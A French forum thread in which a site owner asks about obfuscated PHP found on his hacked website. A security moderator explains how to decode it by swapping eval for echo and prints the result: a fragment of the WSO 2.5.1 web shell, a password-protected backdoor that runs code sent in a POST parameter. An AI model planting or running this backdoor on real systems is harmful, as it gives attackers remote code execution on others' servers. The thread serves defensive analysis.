Site web hacké: fonction php
Résolu/Fermé
4uRoN5
Messages postés
47
Date d'inscription
mardi 30 mars 2010
Statut
Membre
Dernière intervention
20 décembre 2014
-
Modifié par jordane45 le 20/12/2014 à 15:13
4uRoN5 Messages postés 47 Date d'inscription mardi 30 mars 2010 Statut Membre Dernière intervention 20 décembre 2014 - 20 déc. 2014 à 18:38
4uRoN5 Messages postés 47 Date d'inscription mardi 30 mars 2010 Statut Membre Dernière intervention 20 décembre 2014 - 20 déc. 2014 à 18:38
A voir également:
- Site web hacké: fonction php
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Web office - Guide
- Création site web - Guide
- Quel site remplace coco - Accueil - Réseaux sociaux
3 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 666
Modifié par jordane45 le 20/12/2014 à 16:22
Modifié par jordane45 le 20/12/2014 à 16:22
Il faut que tu remplaces à la fin le eval par un echo pour obtenir le code généré,
c'est une backdoor PHP qui permet d'executer le code envoyé en paramètre (avec un mot de passe).
Truc plutôt classique.
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
c'est une backdoor PHP qui permet d'executer le code envoyé en paramètre (avec un mot de passe).
Truc plutôt classique.
php bla.php $auth_pass = "b93703619055f43044958d0419056ca3"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5.1'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { header('HTTP/1.0 404 Not Found'); die("404"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']);
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 666
20 déc. 2014 à 15:05
20 déc. 2014 à 15:05
Salut
pas chez moi mais intéressant je regarderai ce soit.
--
pas chez moi mais intéressant je regarderai ce soit.
--
4uRoN5
Messages postés
47
Date d'inscription
mardi 30 mars 2010
Statut
Membre
Dernière intervention
20 décembre 2014
2
Modifié par 4uRoN5 le 20/12/2014 à 18:39
Modifié par 4uRoN5 le 20/12/2014 à 18:39
En effet comme la souligné Malekal_morte- il suffit de remplacer le eval par un echo, aussi simple que ça.
Merci à toi !
Merci à toi !